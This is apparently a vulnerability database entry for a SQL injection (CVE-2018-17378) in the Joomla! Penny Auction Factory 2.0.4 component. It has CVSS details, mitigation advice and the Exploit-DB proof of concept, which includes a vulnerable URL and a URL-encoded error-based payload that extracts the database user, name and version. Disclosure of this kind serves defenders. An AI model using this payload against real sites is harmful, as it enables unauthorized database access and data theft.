Joomla! Component Penny Auction Factory 2.0.4 - SQL Injection

vendor:

Penny Auction Factory

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Penny Auction Factory

Affected Version From: 2.0.4

Affected Version To: 2.0.4

Patch Exists: YES

Related CWE: CVE-2018-17378

CPE: a:thephpfactory:penny_auction_factory:2.0.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component Penny Auction Factory 2.0.4 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Penny Auction Factory 2.0.4. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in application's database. This can be exploited to manipulate or disclose arbitrary data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries (also known as prepared statements) to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Penny Auction Factory 2.0.4 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/penny-auction-factory/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17378
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_pennyfactory&task=showSearchResults&filter_order_Dir[SQL]&filter_order=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# # # #